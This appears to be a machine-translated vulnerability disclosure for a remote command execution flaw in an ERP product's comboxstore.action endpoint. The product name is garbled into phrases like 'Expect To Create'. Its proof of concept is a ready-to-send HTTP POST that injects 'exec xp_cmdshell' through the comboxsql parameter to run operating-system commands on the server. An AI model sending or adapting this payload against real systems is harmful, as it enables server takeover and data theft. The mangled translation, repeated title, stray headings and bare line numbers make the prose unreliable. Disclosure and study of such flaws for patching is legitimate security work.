Expect To Create Erp Comboxstore Action Remote Command Execution Vulnerability
Expect To Create Erp Comboxstore Action Remote Command Execution Vulnerability
Expect to create ERP comboxstore.action remote command execution vulnerability
Vulnerability Description
I hope to create a remote command execution vulnerability in the ERP comboxstore.action interface. The attacker can obtain server permissions and execute any commands through the vulnerability.
Vulnerability Impact
Hope to manufacture ERP
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
2
3
4
5
POST /mainFunctions/comboxstore.action HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host:
comboxsql=exec%20xp_cmdshell%20'type%20C:\Windows\Win.ini'
This post is licensed under CC BY 4.0 by the author.